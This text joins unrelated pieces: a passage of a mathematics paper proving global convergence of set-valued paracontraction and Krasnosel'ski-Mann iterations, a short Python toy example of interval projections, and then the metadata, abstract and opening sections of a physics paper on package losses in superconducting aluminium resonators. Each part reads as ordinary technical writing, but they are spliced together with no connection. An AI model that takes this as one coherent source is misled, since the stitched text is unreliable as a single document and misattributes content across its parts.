(inexact) iterates of a nonexpansive mapping to one of its fixed points. Since that seminal result, many developments have taken place in this field including, in particular, studies of feasibility, common fixed point problems and variational inequalities, which find important applications in mathematical analysis, optimization theory, and in engineering, medical and the natural sciences [3; 5; 8; 9; 15; 16; 18; 19]. In particular in [17], it was considered a framework for the analysis of iterative algorithms, which can be described in terms of a structured set-valued operator. Namely, at every point in the ambient space, it is assumed that the value of the operator can be expressed as a finite union of values of single-valued paracontracting operators. For such algorithms it was shown in [17] that the associated fixed point iteration is locally convergent around strong fixed points. In [6] an analogous result was obtained for Krasnosel'ski-Mann iterations. The result of [17] generalizes a theorem due to Bauschke and Noll [4]. In the present paper we generalize the main result of [17] and show the global convergence of the algorithm for an arbitrary starting point. An analogous result is also proved for the Krasnosel'ski-Mann iterations. ## 2 Global convergence of iterates Suppose that \((X,\rho)\) is a metric space and that \(C\subset X\) is its nonempty, closed set. For every point \(x\in X\) and every positive number \(r\) define \[B(x,r)=\{y\in X:\ \rho(x,y)\leq r\}.\] For each \(x\in X\) and each nonempty set \(D\subset X\) set \[\rho(x,D)=\inf\{\rho(x,y):\ y\in D\}.\] For every operator \(S:C\to C\) set \[\operatorname{Fix}(S)=\{x\in C:\ S(x)=x\}.\] Fix \[\theta\in C.\] Suppose that the following assumption holds: (A1) For each \(M>0\) the set \(B(\theta,M)\cap C\) is compact. 
Assume that \(m\) is a natural number, \(T_{i}:C\to C\), \(i=1,\ldots,m\) are continuous operators and that the following assumption holds: (A2) For every natural number \(i\in\{1,\ldots,m\}\), every point \(z\in\operatorname{Fix}(T_{i})\), every point \(x\in C\) and every \(y\in C\setminus\operatorname{Fix}(T_{i})\), we have \[\rho(z,T_{i}(x))\leq\rho(z,x)\] \[\rho(z,T_{i}(y))<\rho(z,y).\] Note that operators satisfying (A2) are called paracontractions [7]. Assume that for every point \(x\in X\), a nonempty set \[\phi(x)\subset\{1,\ldots,m\} \tag{1}\] is given. In other words, \[\phi:X\to 2^{\{1,\ldots,m\}}\setminus\{\emptyset\}.\] Suppose that the following assumption holds: (A3) For each \(x\in C\) there exists \(\delta>0\) such that for each \(y\in B(x,\delta)\cap C\), \[\phi(y)\subset\phi(x).\] Define \[T(x)=\{T_{i}(x):\;i\in\phi(x)\} \tag{2}\] for each \(x\in C\), \[\bar{F}(T)=\{z\in C:\;T_{i}(z)=z,\;i=1,\ldots,m\} \tag{3}\] and \[F(T)=\{z\in C:\;z\in T(z)\}. \tag{4}\] Assume that \[\bar{F}(T)\neq\emptyset.\] Denote by \(\mbox{Card}(D)\) the cardinality of a set \(D\). For each \(z\in R^{1}\) set \[\lfloor z\rfloor=\inf\{i:\;i\mbox{ is an integer and }i\leq z\}.\] In the sequel we suppose that the sum over empty set is zero. We study the asymptotic behavior of sequences of iterates \(x_{t+1}\in F(x_{t})\), \(t=0,1,\ldots\). In particular we are interested in their convergence to a fixed point of \(T\). This iterative algorithm was introduced in [17] which also contains its application to sparsity constrained minimisation. The following result, which is proved in Section 4, shows that almost all iterates of our set-valued mappings are approximated solutions of the corresponding fixed point problem. Many results of this type are collected in [18; 19]. Theorem 2.1: _Assume that \(M>0\), \(\epsilon\in(0,1)\) and that_ \[\bar{F}(T)\cap B(\theta,M)\neq\emptyset. \tag{5}\] _Then there exists an integer \(Q\geq 1\) such that for each sequence \(\{x_{i}\}_{i=0}^{\infty}\subset C\) which satisfy_ \[\rho(x_{0},\theta)\leq M\] _and_ \[x_{t+1}\in F(x_{t})\mbox{ for each integer }t\geq 0\] _the inequality_ \[\rho(x_{t},\theta)\leq 3M\] _holds for all integers \(t\geq 0\),_ \[\mbox{Card}(\{t\in\{0,1,\ldots,\}:\ \rho(x_{t},x_{t+1})>\epsilon\})\leq Q\] _and \(\lim_{t\to\infty}\rho(x_{t},x_{t+1})=0\)._ The following global convergence result is proved in Section 5. **Theorem 2.2**: _Assume that a sequence \(\{x_{t}\}_{t=0}^{\infty}\subset C\) and that for each integer \(t\geq 0\),_ \[x_{t+1}\in F(x_{t}).\] _Then there exist_ \[x_{*}=\lim_{t\to\infty}x_{t}\] _and a natural number \(t_{0}\) such that for each integer \(t\geq t_{0}\)_ \[\phi(x_{t})\subset\phi(x_{*})\] _and if an integer \(i\in\phi(x_{t})\) satisfies \(x_{t+1}=T_{i}(x_{t})\), then_ \[T_{i}(x_{*})=x_{*}.\] Theorem 2.2 generalizes the main result of [17] which establishes a local convergence of the iterative algorithm for iterates starting from a point belonging to a neighborhood of a strong fixed point belonging to the set \(\bar{F}(T)\). ## 3 An auxiliary result **Lemma 3.1**: _Assume that \(M,\epsilon>0\) and that \(z_{*}\in C\) satisfies_ \[T_{i}(z_{*})=z_{*},\;i=1,\ldots,m. \tag{6}\] _Then there exists \(\delta>0\) such that for each \(s\in\{1,\ldots,m\}\) and each \(x\in C\cap B(\theta,M)\) satisfying_ \[\rho(x,T_{s}(x))>\epsilon \tag{7}\] the inequality_ \[\rho(z_{*},T_{s}(x))\leq\rho(z_{*},x)-\delta \tag{8}\] _is true._ Proof: Let \(s\in\{1,\ldots,m\}\). 
It is sufficient to show that there exists \(\delta>0\) such that for each \(x\in C\cap B(\theta,M)\) satisfying (7) inequality (8) is true. Assume the contrary. Then for each integer \(k\geq 1\), there exists \[x_{k}\in C\cap B(\theta,M) \tag{9}\] such that \[\rho(x_{k},T_{s}(x_{k}))>\epsilon \tag{10}\] and \[\rho(z_{*},T_{s}(x_{k}))>\rho(z_{*},x_{k})-k^{-1}. \tag{11}\] In view of (A1) and (9), extracting a subsequence and re-indexing, we may assume without loss of generality that there exists \[x_{*}=\lim_{k\to\infty}x_{k}. \tag{12}\] By (9)-(12) and the continuity of \(T_{s}\), \[\rho(x_{*},\theta)\leq M,\] \[\rho(x_{*},T_{s}(x_{*}))=\lim_{k\to\infty}\rho(x_{k},T_{s}(x_{k}))\geq\epsilon\] and \[\rho(z_{*},T_{s}(x_{*}))\geq\rho(z_{*},x_{*}).\] This contradicts (6) and (A2). The contradiction we have reached proves Lemma 3.1. ## 4 Proof of Theorem 2.1 By (5), there exists \[z_{*}\in B(\theta,M)\cap\bar{F}(T). \tag{13}\] Lemma 3.1 implies that there exists \(\delta\in(0,\epsilon)\) such that the following property holds: (a) for each \(s\in\{1,\ldots,m\}\) and each \(x\in C\cap B(z_{*},2M)\) satisfying \[\rho(x,T_{s}(x))>\epsilon\] we have \[\rho(z_{*},T_{s}(x))\leq\rho(z_{*},x)-\delta.\] Choose a natural number \[Q\geq 2M\delta^{-1}. \tag{14}\] Assume that \(\{x_{i}\}_{i=0}^{\infty}\subset C\), \[\rho(x_{0},\theta)\leq M \tag{15}\] and that for each integer \(t\geq 0\), \[x_{t+1}\in F(x_{t}). \tag{16}\] Let \(t\geq 0\) be an integer. By (2) and (16), there exists \(s\in\{1,\ldots,m\}\) such that \[x_{t+1}=T_{s}(x_{t}). \tag{17}\] Assumption (A2) and equations (3), (13) and (17) imply that \[\rho(z_{*},x_{t+1})=\rho(z_{*},T_{s}(x_{t}))\leq\rho(z_{*},x_{t}). \tag{18}\] Since \(t\) is an arbitrary nonnegative integer equations (13), (15) and (18) imply that for each integer \(i\geq 0\), \[\rho(z_{*},x_{i})\leq\rho(z_{*},x_{0})\leq 2M \tag{19}\] and \[\rho(x_{i},\theta)\leq 3M.\] Assume that \[\rho(x_{t+1},x_{t})>\epsilon. \tag{20}\] Property (a) and equations (17), (19) and (20) imply that \[\rho(z_{*},x_{t+1})=\rho(z_{*},T_{s}(x_{t}))\leq\rho(z_{*},x_{t})-\delta.\] Thus we have shown that the following property holds: (b) if an integer \(t\geq 0\) satisfies (20), then \[\rho(z_{*},x_{t+1})\leq\rho(z_{*},x_{t})-\delta.\] Assume that \(n\geq 1\) is an integer. Property (b) and equations (18)-(20) imply that \[2M\geq\rho(z_{*},x_{0})\geq\rho(z_{*},x_{0})-\rho(z_{*},x_{n+1})\] \[=\sum_{t=0}^{n}(\rho(z_{*},x_{t})-\rho(z_{*},x_{t+1}))\] \[\geq\sum\{\rho(z_{*},x_{t})-\rho(z_{*},x_{t+1}):\;t\in\{0,\ldots,n\},\;\rho(x_ {t},x_{t+1})>\epsilon\}\] \[\geq\delta\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\rho(x_{t},x_{t+1})>\epsilon\})\] and in view of (14), \[\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\rho(x_{t},x_{t+1})>\epsilon\})\leq 2M \delta^{-1}\leq Q.\] Since \(n\) is an arbitrary natural number we conclude that \[{\rm Card}(\{t\in\{0,1,\ldots\}:\ \rho(x_{t},x_{t+1})>\epsilon\})\leq Q.\] Since \(\epsilon\) is any element of \((0,1)\) Theorem 2.1 is proved. ## 5 Proof of Theorem 2.2 In view of Theorem 2.1, the sequence \(\{x_{t}\}_{t=0}^{\infty}\) is bounded. In view of (A1), it has a limit point \(x_{*}\in C\) and a subsequence \(\{x_{t_{k}}\}_{k=0}^{\infty}\) such that \[x_{*}=\lim_{k\to\infty}x_{t_{k}}. \tag{21}\] In view of (A3) and (21), we may assume without loss of generality that \[\phi(x_{t_{k}})\subset\phi(x_{*}),\;k=1,2,\ldots \tag{22}\] and that there exists \[\widehat{p}\in\phi(x_{*})\] such that \[x_{t_{k}+1}=T_{\widehat{p}}(x_{t_{k}}),\;k=1,2,\ldots. 
\tag{23}\] It follows from Theorem 2.1, the continuity of \(T_{\widehat{p}}\) and equations (21) and (23) that \[T_{\widehat{p}}(x_{*})=\lim_{k\to\infty}T_{\widehat{p}}(x_{t_{k}})=\lim_{k\to\infty}x_{t_{k}+1}=\lim_{k\to\infty}x_{t_{k}}=x_{*}. \tag{24}\] Set \[I_{1}=\{i\in\phi(x_{*}):\;T_{i}(x_{*})=x_{*}\},\;I_{2}=\phi(x_{*})\setminus I_{1}. \tag{25}\] In view of (24) and (25), \[\widehat{p}\in I_{1}.\] Fix \(\delta_{0}\in(0,1)\) such that \[\rho(x_{*},T_{i}(x_{*}))>2\delta_{0},\;i\in I_{2}. \tag{26}\] Assumption (A3), the continuity of \(T_{i},\;i=1,\ldots,m\) and (26) imply that there exists \(\delta_{1}\in(0,\delta_{0})\) such that for each \(x\in B(x_{*},\delta_{1})\cap C\), \[\phi(x)\subset\phi(x_{*}), \tag{27}\] \[\rho(x,T_{i}(x))>\delta_{0},\;i\in I_{2}. \tag{28}\] Theorem 2.1 implies that there exists an integer \(q_{1}\geq 1\) such that for each integer \(t\geq q_{1}\), \[\rho(x_{t},x_{t+1})\leq\delta_{0}/2. \tag{29}\] Assume that \[\epsilon\in(0,\delta_{1}), \tag{30}\] \[t\geq q_{1} \tag{31}\] is an integer and that \[\rho(x_{t},x_{*})\leq\epsilon. \tag{32}\] It follows from (27), (28), (30) and (32) that \[\phi(x_{t})\subset\phi(x_{*}) \tag{33}\] and \[\rho(x_{t},T_{i}(x_{t}))>\delta_{0},\;i\in I_{2}. \tag{34}\] In view of (33), there exists \[s\in\phi(x_{*})\] such that \[x_{t+1}=T_{s}(x_{t}). \tag{35}\] By (29), (31) and (35), \[\rho(x_{t},T_{s}(x_{t}))=\rho(x_{t},x_{t+1})\leq\delta_{0}/2. \tag{36}\] It follows from (25), (34) and (36) that \[s\in I_{1},\;T_{s}(x_{*})=x_{*}.\] Combined with assumption (A2) and equations (32) and (35) this implies that \[\rho(x_{t+1},x_{*})=\rho(T_{s}(x_{t}),x_{*})\leq\rho(x_{t},x_{*})\leq\epsilon.\] Thus we have shown that if \(t\geq q_{1}\) is an integer and (32) holds, then (33) is true and if \(s\in\phi(x_{*})\) and (35) holds, then \(s\in I_{1}\) and \(\rho(x_{t+1},x_{*})\leq\epsilon\). By induction and (21), we obtain that \[\rho(x_{i},x_{*})\leq\epsilon\] for all sufficiently large natural numbers \(i\). Since \(\epsilon\) is an arbitrary element of \((0,\delta_{1})\), we conclude that \[\lim_{t\rightarrow\infty}x_{t}=x_{*}\] and Theorem 2.2 is proved. ## 6 Krasnosel'ski-Mann iterations Assume that \((X,\|\cdot\|)\) is a normed space and that \(\rho(x,y)=\|x-y\|,\;x,y\in X\). We use the notation, definitions and assumptions introduced in Section 2. In particular, we assume that assumptions (A1)-(A3) hold. Suppose that the set \(C\) is convex and denote by \(Id:X\to X\) the identity operator: \(Id(x)=x\), \(x\in X\). Let \[\kappa\in(0,2^{-1}).\] We consider the Krasnosel'ski-Mann iteration associated with our set-valued mapping \(T\) and obtain a global convergence result (see Theorem 6.2 below) which generalizes the local convergence result of [6] for iterates starting from a point belonging to a neighborhood of a strong fixed point belonging to the set \(\bar{F}(T)\). The following result is proved in Section 7.
Theorem 6.1: _Assume that \(M>0\), \(\epsilon\in(0,1)\) and that_ \[\bar{F}(T)\cap B(\theta,M)\neq\emptyset \tag{37}\] _Then there exists an integer \(Q\geq 1\) such that for each_ \[\{\lambda_{t}\}_{t=0}^{\infty}\subset(\kappa,1-\kappa) \tag{38}\] _and each sequence \(\{x_{i}\}_{i=0}^{\infty}\subset C\) which satisfies_ \[\|x_{0}-\theta\|\leq M\] _and_ \[x_{t+1}\in(1-\lambda_{t})x_{t}+\lambda_{t}T(x_{t})\text{ for each integer }t\geq 0 \tag{39}\] the inequality_ \[\|x_{t}-\theta\|\leq 3M\] _holds for all integers \(t\geq 0\),_ \[\text{Card}(\{t\in\{0,1,\dots,\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\leq Q\] _and \(\lim_{t\to\infty}\|x_{t}-x_{t+1}\|=0\)._ The following result is proved in Section 8. **Theorem 6.2**: _Assume that_ \[\{\lambda_{t}\}_{t=0}^{\infty}\subset(\kappa,1-\kappa)\] _and that a sequence \(\{x_{t}\}_{t=0}^{\infty}\subset C\) satisfies (39). Then there exist_ \[x_{*}=\lim_{t\to\infty}x_{t}\] _and a natural number \(t_{0}\) such that for each integer \(t\geq t_{0}\)_ \[\phi(x_{t})\subset\phi(x_{*})\] _and if an integer \(i\in\phi(x_{t})\) satisfies_ \[x_{t+1}=\lambda_{t}T_{i}(x_{t})+(1-\lambda)x_{t},\] _then_ \[T_{i}(x_{*})=x_{*}.\] ## 7 Proof of Theorem 6.1 By (37), there exists \[z_{*}\in B(\theta,M)\cap\bar{F}(T). \tag{40}\] Lemma 3.1 implies that there exists \(\delta\in(0,\epsilon)\) such that the following property holds: (c) for each \(s\in\{1,\ldots,m\}\) and each \(x\in C\cap B(z_{*},2M)\) satisfying \[\rho(x,T_{s}(x))>\epsilon\] we have \[\rho(z_{*},T_{s}(x))\leq\rho(z_{*},x)-\delta.\] Choose a natural number \[Q\geq 2M\delta^{-1}\kappa^{-1}. \tag{41}\] Assume that (38) holds and that a sequence \(\{x_{i}\}_{i=0}^{\infty}\subset C\) satisfies (39) and \[\|x_{0}-\theta\|\leq M. \tag{42}\] Let \(t\geq 0\) be an integer. By (2) and (39), there exists \(s\in\{1,\ldots,m\}\) such that \[x_{t+1}=\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}. \tag{43}\] Assumption (A2) and equations (3), (40) and (43) imply that \[\|x_{t+1}-z_{*}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-z_{*}\|\] \[\leq\lambda_{t}\|T_{s}(x_{t})-z_{*}\|+(1-\lambda_{t})\|x_{t}-z_{*}\|\leq\|z_{* }-x_{t}\|. \tag{44}\] Since \(t\) is an arbitrary nonnegative integer equations (40), (42) and (44) imply that for each integer \(i\geq 0\), \[\|z_{*}-x_{i}\|\leq\|z_{*}-x_{0}\|\leq 2M\] and \[\|x_{i}-\theta\|\leq 3M.\] Assume that \[\|x_{t+1}-x_{t}\|>\epsilon. \tag{45}\] It follows from (38), (43) and (45) that \[\epsilon<\|x_{t+1}-x_{t}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-x_{ t}\|=\lambda_{t}\|T_{s}(x_{t})-x_{t}\|\] and \[\|T_{s}(x_{t})-x_{t}\|\geq\epsilon\lambda_{t}^{-1}\geq\epsilon(1-\kappa)^{-1}. \tag{46}\] Property (c) and equation (46) imply that \[\|z_{*}-T_{s}(x_{t})\|\leq\|z_{*}-x_{t}\|-\delta. \tag{47}\] By (38), (43) and (47), \[\|x_{t+1}-z_{*}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-z_{*}\|\] \[\leq\lambda_{t}\|T_{s}(x_{t})-z_{*}\|+(1-\lambda_{t})\|x_{t}-z_{*}\|\] \[\leq\lambda_{t}(\|x_{t}-z_{*}\|-\delta)+(1-\lambda_{t})\|x_{t}-z_{*}\|\] \[\leq\|x_{t}-z_{*}\|-\lambda_{t}\delta\leq\|x_{t}-z_{*}\|-\delta\kappa. \tag{48}\] Thus we have shown that the following property holds: (d) if an integer \(t\geq 0\) satisfies (45), then \[\|z_{*}-x_{t+1}\|\leq\|z_{*}-x_{t}\|-\delta\kappa.\] Assume that \(n\geq 1\) is an integer. 
Property (d) and equations (40), (42) and (44) imply that \[2M\geq\|z_{*}-x_{0}\|\geq\|z_{*}-x_{0}\|-\|z_{*}-x_{n+1}\|\] \[=\sum_{t=0}^{n}(\|z_{*}-x_{t}\|-\|z_{*}-x_{t+1}\|)\] \[\geq\sum\{\|z_{*}-x_{t}\|-\|z_{*}-x_{t+1}\|:\;t\in\{0,\ldots,n\},\;\|x_{t}-x_{t +1}\|>\epsilon\}\] \[\geq\delta\kappa\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\] and in view of (41), \[\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\leq 2M(\delta \kappa)^{-1}\leq Q.\] Since \(n\) is an arbitrary natural number we conclude that \[\mbox{Card}(\{t\in\{0,1,\ldots\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\leq Q.\] Since \(\epsilon\) is any element of \((0,1)\) we obtain that \[\lim_{t\rightarrow\infty}\|x_{t}-x_{t+1}\|=0.\] Theorem 6.1 is proved. ## 8 Proof of Theorem 6.2 In view of Theorem 6.1, the sequence \(\{x_{t}\}_{t=0}^{\infty}\) is bounded. In view of (A1), it has a limit point \(x_{*}\in C\) and a subsequence \(\{x_{t_{k}}\}_{k=0}^{\infty}\) such that \[x_{*}=\lim_{k\to\infty}x_{t_{k}}. \tag{49}\] In view of (A3) and equations (38), (39) and (49), extracting a subsequence and re-indexing, we may assume without loss of generality that \[\phi(x_{t_{k}})\subset\phi(x_{*}),\;k=1,2,\ldots \tag{50}\] and that there exists \[\widehat{p}\in\phi(x_{*})\] such that \[x_{t_{k}+1}=\lambda_{t_{k}}T_{\widehat{p}}(x_{t_{k}})+(1-\lambda_{t_{k}})x_{t _{k}},\;k=1,2,\ldots \tag{51}\] and that there exists \[\lambda_{*}=\lim_{k\to\infty}\lambda_{t_{k}}\in[\kappa,1-\kappa]. \tag{52}\] It follows from Theorem 6.1, the continuity of \(T_{\widehat{p}}\) and equations (49), (51) and (52) that \[\lambda_{*}T_{\widehat{p}}(x_{*})+(1-\lambda_{*})x_{*}\] \[=\lim_{k\to\infty}(\lambda_{t_{k}}T_{\widehat{p}}(x_{t_{k}})+(1-\lambda_{t_{k }})x_{t_{k}})\] \[=\lim_{k\to\infty}x_{t_{k}+1}=\lim_{k\to\infty}x_{t_{k}}=x_{*}. \tag{53}\] Set \[I_{1}=\{i\in\phi(x_{*}):\;T_{i}(x_{*})=x_{*}\},\;I_{2}=\phi(x_{*})\setminus I_ {1}. \tag{54}\] In view of (53) and (54), \[\widehat{p}\in I_{1}.\] Fix \(\delta_{0}\in(0,1)\) such that \[\|x_{*}-T_{i}(x_{*})\|>2\delta_{0},\;i\in I_{2}. \tag{55}\] Assumption (A3), the continuity of \(T_{i},\;i=1,\ldots,m\) and (55) imply that there exists \(\delta_{1}\in(0,\delta_{0})\) such that for each \(x\in B(x_{*},\delta_{1})\cap C\), \[\phi(x)\subset\phi(x_{*}), \tag{56}\] \[\|x-T_{i}(x)\|>\delta_{0},\;i\in I_{2}. \tag{57}\] Theorem 6.1 implies that there exists an integer \(q_{1}\geq 1\) such that for each integer \(t\geq q_{1}\), \[\|x_{t}-x_{t+1}\|\leq\kappa\delta_{0}/2. \tag{58}\] Assume that \[\epsilon\in(0,\delta_{1}), \tag{59}\] \[t\geq q_{1} \tag{60}\] is an integer and that \[\|x_{t}-x_{*}\|\leq\epsilon. \tag{61}\] It follows from (56), (57), (59) and (61) that \[\phi(x_{t})\subset\phi(x_{*}) \tag{62}\] and \[\|x_{t}-T_{i}(x_{t})\|>\delta_{0},\;i\in I_{2}. \tag{63}\] In view of (39), there exists \[s\in\phi(x_{t})\subset\phi(x_{*})\] such that \[x_{t+1}=\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}. \tag{64}\] . By (38), (58) and (64), \[\kappa\delta_{0}/2\geq\|x_{t+1}-x_{t}\|=\lambda_{t}\|T_{s}(x_{t})-x_{t}\|\] and \[\|x_{t}-T_{s}(x_{t})\|\leq\kappa\delta_{0}(2\lambda_{t})^{-1}\leq\delta_{0}/2. 
\tag{65}\] It follows from (54), (56), (57), (59), (61) and (65) that \[s\in I_{1},\;T_{s}(x_{*})=x_{*}.\] Combined with assumption (A2) and equations (39), (61) and (64) this implies that \[\|x_{t+1}-x_{*}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-x_{*}\|\] \[\leq\lambda_{t}\|T_{s}(x_{t})-x_{*}\|+(1-\lambda_{t})\|x_{t}-x_{*}\|\] \[\leq\|x_{t}-x_{*}\|\leq\epsilon.\] Thus we have shown that if \(t\geq q_{1}\) is an integer and (61) holds, then \(\|x_{t+1}-x_{*}\|\leq\epsilon\). By induction and (49), we obtain that \[\|x_{i}-x_{*}\|\leq\epsilon\] for all sufficiently large natural numbers \(i\). Since \(\epsilon\) is an arbitrary element of \((0,\delta_{1})\), we conclude that \[\lim_{t\rightarrow\infty}x_{t}=x_{*}\] and Theorem 6.2 is proved.
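As a concrete, purely illustrative companion to the results above, the following sketch runs both iterations, \(x_{t+1}\in T(x_{t})\) and its Krasnosel'ski-Mann counterpart, for a toy union of two paracontracting operators (metric projections onto two overlapping intervals of the real line). The operators, the selection rule \(\phi\), and the step size are assumptions chosen only to make the dynamics easy to inspect; they are not constructions from the paper.

```python
import random

# Toy paracontracting operators on C = R: metric projections onto two
# overlapping closed intervals.  A projection onto a closed convex set is
# nonexpansive and strictly decreases the distance to any of its fixed
# points when the argument is not already fixed (cf. assumption (A2)).
def T1(x):  # projection onto [0, 2]
    return min(max(x, 0.0), 2.0)

def T2(x):  # projection onto [1, 3]
    return min(max(x, 1.0), 3.0)

OPS = {1: T1, 2: T2}

def phi(x):
    # Constant selection phi(x) = {1, 2}; it trivially satisfies (A3).
    return (1, 2)

def iterate(x0, steps=50, km_lambda=None, seed=0):
    """Run x_{t+1} in T(x_t) (km_lambda=None) or the KM-averaged variant."""
    rng = random.Random(seed)
    x = x0
    for _ in range(steps):
        i = rng.choice(phi(x))          # pick any admissible operator index
        tx = OPS[i](x)
        x = tx if km_lambda is None else (1 - km_lambda) * x + km_lambda * tx
    return x

# Both runs settle at 2.0, which lies in the common fixed-point set [1, 2].
print("plain iteration :", iterate(5.0))
print("KM iteration    :", iterate(5.0, km_lambda=0.4))
```

In this toy setting the iterates become eventually constant (plain case) or converge geometrically (KM case) to a point fixed by every operator that is eventually selected, mirroring the conclusions of Theorems 2.2 and 6.2.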
2304.08629
Identification and Mitigation of Conducting Package Losses for Quantum Superconducting Devices
Low-loss superconducting rf devices are required when used for quantum computation. Here, we present a series of measurements and simulations showing that conducting losses in the packaging of our superconducting resonator devices affect the maximum achievable internal quality factors (Qi) for a series of thin-film Al quarter-wave resonators with fundamental resonant frequencies varying between 4.9 and 5.8 GHz. By utilizing resonators with different widths and gaps, different volumes of the stored electromagnetic energy were sampled thus affecting Qi. When the backside of the sapphire substrate of the resonator device is adhered to a Cu package with a conducting silver glue, a monotonic decrease in the maximum achievable Qi is found as the electromagnetic sampling volume is increased. This is a result of induced currents in large surface resistance regions and dissipation underneath the substrate. By placing a hole underneath the substrate and using superconducting material for the package, we decrease the ohmic losses and increase the maximum Qi for the larger size resonators.
Yizhou Huang, Yi-Hsiang Huang, Haozhi Wang, Zach Steffen, Jonathan Cripe, F. C. Wellstood, B. S. Palmer
2023-04-17T21:51:47Z
http://arxiv.org/abs/2304.08629v2
# Identification and Mitigation of Conducting Package Losses for Quantum Superconducting Devices ###### Abstract Low-loss superconducting microwave devices are required for quantum computation. Here, we present a series of measurements and simulations showing that conducting losses in the packaging of our superconducting resonator devices affect the maximum achievable internal quality factors (\(Q_{i}\)) for a series of thin-film Al quarter-wave resonators with fundamental resonant frequencies varying between 4.9 and 5.8 GHz. By utilizing resonators with different widths and gaps, we sampled different electromagnetic energy volumes for the resonators affecting \(Q_{i}\). When the backside of the sapphire substrate of the resonator device is adhered to a Cu package with a conducting silver glue, a monotonic decrease in the maximum achievable \(Q_{i}\) is found as the electromagnetic sampling volume is increased. This is a result of induced currents in large surface resistance regions and dissipation underneath the substrate. By placing a hole underneath the substrate and using superconducting material for the package, we decrease the ohmic losses and increase the maximum \(Q_{i}\) for the larger size resonators. + Footnote †: preprint: ## I Introduction The ability to produce superconducting devices with low microwave loss and small phase noise is desired for the astronomical detector community and the quantum information community.[1; 2] At the chip level, this requires the use of low-loss materials, clean fabrication processes, and good microwave hygiene.[3; 4; 5] The packaging for the quantum chip should provide good impedance matching over a large bandwidth, a small amount of cross-talk between different signal lines, and have good shielding to reduce radiated losses and prevent stray THz or IR black-body radiation from leaking into the package.[6; 7] In this article, we measure limitations on the maximum achievable internal quality factors, \(Q_{i}\), of a series of superconducting microwave resonators. The source of this loss is from dissipation in normal metal conductors used in the package of the resonator chip. The energy stored in the resonator produces an rf magnetic field \(H\) resulting in the production of shielding eddy currents in nearby conductors when \(H\) impinges upon them. A noticeable amount of dissipation occurs when these shielding currents are produced in conductors with a finite surface resistance. This loss mechanism was initially identified when measuring five resonators on a single chip and noticing a systematic decrease in their quality factors with an increase in the widths and gaps of the resonators. To model this finding, we performed finite-element simulations to estimate the magnitude of dissipation in each conductor used in the package. A conducting adhesive, used to adhere and thermalize the chip to the package, was identified to be the most significant source of loss. By implementing a few changes to the packaging, we reduce this loss and demonstrate over an order of magnitude improvement in the maximum \(Q_{i}\) of the resonators. 
## II Device and Results The thin film Al chip that we measured consists of five multiplexed quarter-wave coplanar waveguide (CPW) resonators coupled to a common coplanar waveguide transmission feedline.[8] The resonators had different fundamental resonant frequencies \(f_{\circ}\), CPW widths \(w\) and gaps \(g\) ranging from \(f_{\circ}=4.9\) GHz, \(w=3\)\(\mu\)m and \(g=1.5\)\(\mu\)m for R1 up to \(f_{\circ}=5.8\) GHz, \(w=22\)\(\mu\)m and \(g=11\)\(\mu\)m for R5 (see supplemental material for more details). The same chip was sequentially packaged in four different ways and measured. To efficiently conduct heat from the chip, a silver impregnated conducting adhesive,[9] diluted with toluene, was used to attach the chip in each package. For the first measurement, the backside of the chip was glued to an OFHC Cu package (denoted Cu\(\blacksquare\)). A two layer Cu printed circuit board (PCB) was used to interface rf signals from a non-magnetic SMA connector to the resonator chip (see Fig.1 (a) for a CAD rendering). To measure the low-temperature loss of the resonators, the device was bolted to the mixing chamber stage of a Leiden cryogen-free dilution refrigerator, connected to input and output microwave cables, encased in two open ended Amumated 4K cylinders, and cooled to a temperature less than 20 mK. (See Ref.[10] for details of the set-up.) A vector network analyzer was used to measure the in-phase and out-of-phase ratio of the transmitted voltage to input voltage at 1601 different discrete frequencies (\(S_{21}(f)\)) spanning the resonance and at different input drive voltages. Each \(S_{21}(f)\) scan was repeated multiple times, from which the mean \(\bar{S}_{21}(f)\) and the standard deviation \(\sigma_{S_{21}}(f)\) at each frequency were calculated for both quadratures. Both quadratures of the mean \(\bar{S}_{21}(f)\) were simultaneously fitted, weighted by \(1/\sigma_{S_{21}}(f)\), using the diameter-correction method [11] to extract 5 fitting parameters including \(Q_{i}\). Fig. 2 shows a log-log plot of the fitted \(Q_{i}\) versus stored average photon number from the first measurement of the resonators in Cu\(\blacksquare\) package. For R1, a weak increase in \(Q_{i}\) with increasing power was observed with a maximum \(Q_{i,m}\simeq 2\times 10^{6}\). As \(w\) and \(g\) of the resonators increase, the observed power dependence decreases and \(Q_{i,m}\) decreases to \(Q_{i,m}=10^{5}\) for resonator R5. The focus of this paper is to determine the physical mechanism responsible for the limitations on \(Q_{i,m}\). These limitations are not consistent with losses at the interfaces near the resonator since \(Q_{i,m}\) decreases with an increase in \(g\) and \(w\). [12] Instead, loss farther from the resonator was thought to be the source. Since normal metal conductors were underneath and surrounded the resonator chip, our conjecture was that Ohmic dissipation from these normal metal components limited \(Q_{i,m}\). To examine this hypothesis, we modified the package and remeasured the same resonator chip. First, a 4.2 mm \(\times\) 4.2 mm wide hole that was 2.5 mm deep was milled out of the bottom of the Cu package where the chip resided. To adhere the device, glue was added to two corners of the chip and along the sides (see purple regions in Fig. 1(a)). With these modifications (denoted Cu\(\square\)), all of the \(Q_{i,m}\)'s improved, especially for R5 which demonstrated over a factor of 20 improvement (see Fig. 3). 
